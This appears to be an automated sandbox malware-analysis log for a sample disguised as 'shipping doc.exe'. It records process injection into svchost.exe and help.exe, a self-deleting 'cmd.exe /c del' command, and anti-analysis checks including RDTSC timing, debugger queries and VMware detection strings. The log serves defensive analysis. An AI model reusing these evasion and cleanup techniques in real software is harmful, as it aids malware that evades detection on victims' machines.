          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --disable-nacl --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --time-ticks-at-unix-epoch=-1714734611839441 --launch-time-ticks=182837962 --mojo-platform-channel-handle=4392 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-nacl --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --time-ticks-at-unix-epoch=-1714734611839441 --launch-time-ticks=183415711 --mojo-platform-channel-handle=4880 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
          Source: shipping doc.exeStatic file information: File size 1140224 > 1048576
          Source: shipping doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: shipping doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: shipping doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: shipping doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: shipping doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: shipping doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: shipping doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: shipping doc.exe, 00000000.00000003.1778277441.00000000042E0000.00000004.00001000.00020000.00000000.sdmp, shipping doc.exe, 00000000.00000003.1778898158.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1896083913.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1779871124.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1896083913.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1781630445.0000000003800000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1900597233.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1894984322.00000000029A3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: shipping doc.exe, 00000000.00000003.1778277441.00000000042E0000.00000004.00001000.00020000.00000000.sdmp, shipping doc.exe, 00000000.00000003.1778898158.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1896083913.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1779871124.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1896083913.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1781630445.0000000003800000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1900597233.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1894984322.00000000029A3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: help.pdbGCTL source: svchost.exe, 00000001.00000002.1895405564.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1895424244.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898409184.0000000003D80000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: chrome.exe, 0000000C.00000000.2014617477.0000000033F6F000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 0000000D.00000000.2099344946.0000000022D1F000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 0000000E.00000000.2161914269.0000000014DBF000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 0000000F.00000000.2221158494.00000000125DF000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 00000010.00000000.2286828425.000000002657F000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 00000011.00000000.2347747516.00000000256CF000.00000004.00000001.00040000.00000000.sdmp
          Source: Binary string: help.pdb source: svchost.exe, 00000001.00000002.1895405564.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1895424244.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898409184.0000000003D80000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: chrome.exe, 0000000C.00000000.2014617477.0000000033F6F000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 0000000D.00000000.2099344946.0000000022D1F000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 0000000E.00000000.2161914269.0000000014DBF000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 0000000F.00000000.2221158494.00000000125DF000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 00000010.00000000.2286828425.000000002657F000.00000004.00000001.00040000.00000000.sdmp, chrome.exe, 00000011.00000000.2347747516.00000000256CF000.00000004.00000001.00040000.00000000.sdmp
          Source: shipping doc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: shipping doc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: shipping doc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: shipping doc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: shipping doc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000E42DE
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00100A76 push ecx; ret 0_2_00100A89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168C8 push ebx; ret 1_2_004168E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E145 push ebx; iretd 1_2_0040E14E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040F203 push esi; ret 1_2_0040F204
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040F205 push ds; iretd 1_2_0040F208
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B75 push cs; retf 1_2_00416BCA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3D6 push ebx; iretd 1_2_0040E409
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3B7 push ebx; iretd 1_2_0040E409
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D4F2 push eax; ret 1_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D4FB push eax; ret 1_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D4A5 push eax; ret 1_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D55C push eax; ret 1_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0225F pushad ; ret 1_2_03A027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A027FA pushad ; ret 1_2_03A027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A309AD push ecx; mov dword ptr [esp], ecx1_2_03A309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0283D push eax; iretd 1_2_03A02858
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A01366 push eax; iretd 1_2_03A01369
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_000FF98E
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00171C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00171C41
          Source: C:\Users\user\Desktop\shipping doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\shipping doc.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98492
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 139904 second address: 13990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 139B6E second address: 139B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4010Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5927Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 838Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 793Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeWindow / User API: threadDelayed 5001Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeWindow / User API: threadDelayed 4973Jump to behavior
          Source: C:\Users\user\Desktop\shipping doc.exeAPI coverage: 3.9 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 1.7 %
          Source: C:\Windows\explorer.exe TID: 7872Thread sleep count: 4010 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7872Thread sleep time: -8020000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7872Thread sleep count: 5927 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7872Thread sleep time: -11854000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 5716Thread sleep count: 5001 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 5716Thread sleep time: -10002000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 5716Thread sleep count: 4973 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 5716Thread sleep time: -9946000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0014DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0014DBBE
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001568EE FindFirstFileW,FindClose,0_2_001568EE
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0015698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0015698F
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0014D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0014D076
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0014D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0014D3A9
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00159642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00159642
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0015979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0015979D
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00159B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00159B2B
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00155C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00155C97
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000E42DE
          Source: explorer.exe, 00000002.00000000.1819139034.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000003.3112104349.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000002.00000003.3112104349.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000002.00000000.1819139034.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000002.00000000.1783542988.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000002.00000000.1819139034.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.1812586501.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000002.00000003.3112104349.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000002.00000000.1818187033.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1818187033.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6282433377.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6282433377.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3112104349.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3112104349.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000000.1819139034.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000002.00000000.1812586501.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3111309486.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000002.00000000.1783542988.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000002.00000000.1818187033.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000002.00000000.1783542988.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040ACE0 LdrLoadDll,1_2_0040ACE0
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0015EAA2 BlockInput,0_2_0015EAA2
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00112622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00112622
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000E42DE
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00104CE8 mov eax, dword ptr fs:[00000030h]0_2_00104CE8
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_01823510 mov eax, dword ptr fs:[00000030h]0_2_01823510
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_01823570 mov eax, dword ptr fs:[00000030h]0_2_01823570
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_01821ED0 mov eax, dword ptr fs:[00000030h]0_2_01821ED0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]1_2_03A2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]1_2_03A2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]1_2_03A2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5438F mov eax, dword ptr fs:[00000030h]1_2_03A5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5438F mov eax, dword ptr fs:[00000030h]1_2_03A5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]1_2_03A28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]1_2_03A28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]1_2_03A28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03A4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03A4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03A4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A663FF mov eax, dword ptr fs:[00000030h]1_2_03A663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEC3CD mov eax, dword ptr fs:[00000030h]1_2_03AEC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB63C0 mov eax, dword ptr fs:[00000030h]1_2_03AB63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]1_2_03ADE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]1_2_03ADE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]1_2_03ADE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]1_2_03ADE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD43D4 mov eax, dword ptr fs:[00000030h]1_2_03AD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD43D4 mov eax, dword ptr fs:[00000030h]1_2_03AD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B08324 mov eax, dword ptr fs:[00000030h]1_2_03B08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B08324 mov ecx, dword ptr fs:[00000030h]1_2_03B08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B08324 mov eax, dword ptr fs:[00000030h]1_2_03B08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B08324 mov eax, dword ptr fs:[00000030h]1_2_03B08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]1_2_03A6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]1_2_03A6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]1_2_03A6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C310 mov ecx, dword ptr fs:[00000030h]1_2_03A2C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A50310 mov ecx, dword ptr fs:[00000030h]1_2_03A50310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD437C mov eax, dword ptr fs:[00000030h]1_2_03AD437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
